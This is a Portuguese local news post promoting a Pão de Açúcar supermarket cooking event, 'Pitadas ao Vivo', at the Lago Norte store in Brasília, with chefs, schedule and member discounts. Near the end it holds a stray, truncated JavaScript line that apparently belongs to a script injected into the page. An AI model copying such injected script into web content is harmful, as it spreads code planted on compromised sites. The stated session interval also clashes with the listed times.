Lago Norte tem “Pitadas ao Vivo” no sábado

Nos dias 19 e 20 de agosto, 16 lojas do Pão de Açúcar em oito Estados receberão o projeto “Pitadas ao Vivo”, que leva às lojas da rede o conteúdo da revista semanal do Pão de Açúcar (a “Pitadas”), apresentando algumas das delícias que a publicação ensina a fazer semanalmente. O evento tem o objetivo de aproximar ainda mais a rede dos seus clientes, por meio do prazer de comer e beber que já é DNA da bandeira. Cada loja contará com a presença de um Chef renomado que ensinará a receita Cestinha de Palmito.

image003

Em Brasília, a loja do Lago Norte receberá a ação na sexta com o Chef Gabriel Rogério e no sábado com o Chef André Rabelo.  Em cada um dos dois dias, serão cinco sessões de aulas abertas ao público e acontecerão a cada 1h30, entre 11h30 e 19h30. Cada aula dura, em média, 30 minutos.

Em um carrinho desenvolvido para a ação, equipado com cooktop, frigobar e espaço para a exposição dos itens utilizados, o chef ensinará a receita Cestinha de Palmito, que pronta poderá ser degustada pelos clientes, acompanhado por um vinho que harmonizará com o prato.  Os principais itens utilizados estarão com descontos em cada loja que acontecerá o “Pitadas Ao Vivo”.  Assim como já ocorre com as demais ofertas da rede de supermercados, os descontos são exclusivos para clientes participantes do programa de relacionamento Pão de Açúcar Mais. Aqueles que ainda não forem, podem se cadastrar previamente ou na hora pelo aplicativo do programa disponível nas lojas de aplicativos dos smartphones (IOS ou Android) ou pelo site www.paodeacucarmais.com.br. O cadastro é gratuito. Mais informações sobre o evento no Facebook da rede.

 Serviço Pitadas Ao Vivo:

Data: Sexta e Sábado – 19 e 20 de agosto

Horários: 11h30; 13h30; 15h30; 17h30 e 19h30

Local: Pão de Açúcar Lago Norte – SHIN QI 2

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário